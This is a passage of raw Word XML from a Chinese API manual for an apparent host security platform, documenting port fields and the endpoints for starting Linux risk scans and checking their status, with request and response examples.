              <w:t>启动参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5AFCD018" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26E46890" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="238C297E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53207DB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2082F4FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>安装包详情：Ver-安装包版本；Name-安装包名；Release-安装包发性版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0E25071F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FC8082E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27EE8FEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="061427F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E4D7F9A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>影响进程关联的端口号信息列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D8EF160" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port返回信息说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="829"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1874"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0A0D27F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FCEC3CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A3A2D5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14EB5B33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24166428" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70274158" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C271D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bindIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F951EE9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16CFD57F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E3E1E90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口绑定的Ip信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="341C37CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D02AE4D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE59803" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35059557" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323EF3D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="32D27517" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="399560A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32A9D4D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="385609DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57C4C550" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>协议：udp/tcp等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EE2C3D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="linux应用风险系统风险对外访问性账号风险"/>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="95"/>
      <w:r>
        <w:t>Linux应用风险/系统风险/对外访问性/账号风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F7900" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供所有的Linux应用风险，系统风险，对外访问性，账号风险的检测和查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7151DECC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="风险扫描-1"/>
      <w:r>
        <w:t>风险扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD243A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于请求主机信息扫描，更新数据查询的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3C977" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414D8EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/{app|system|access|account}/linux/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED328A8"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497C54" w14:paraId="64616D4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5CB9B16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F095DC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="055E88E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B622CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="46D97CA6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08AB45F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA70B04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C5E5178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49687190" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6EA2D63D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="208FD641" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491B4F4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37BE5F6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5F5DEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D7D60FE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7801C224" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7681D324" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D8DF3DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D0E20F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DFEE0BE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600A527" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC91A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB7367" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C870CD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3403629A"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no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA7C06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA4AFFF"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4F009DDB"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5018026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5B4C627" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6322C013" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="472F870C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="055CB1A7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="17D54728" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4421D043" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603F6AD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF18A8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C5D06A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C178133" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>场景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC48028" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>这个api调用前需要先调用4.2.2查询风险扫描执行状态接口，如果该接口返回状态非Running， 则可以调用该风险扫描接口创建job。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79755778" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A987BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果任务创建失败， 抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C91BEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="查询风险扫描执行状态-1"/>
      <w:bookmarkEnd w:id="97"/>
      <w:r>
        <w:t>查询风险扫描执行状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05412AC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301268C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/api/vul/{app|system|access|account}/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49C639" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22465A31" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFEC956" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EE9A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/app/linux/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD62D17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428CB694" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status":"Running|Success|Failed"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4522D5"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="7334"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="278FF98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65621C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="015A349F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA1781F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
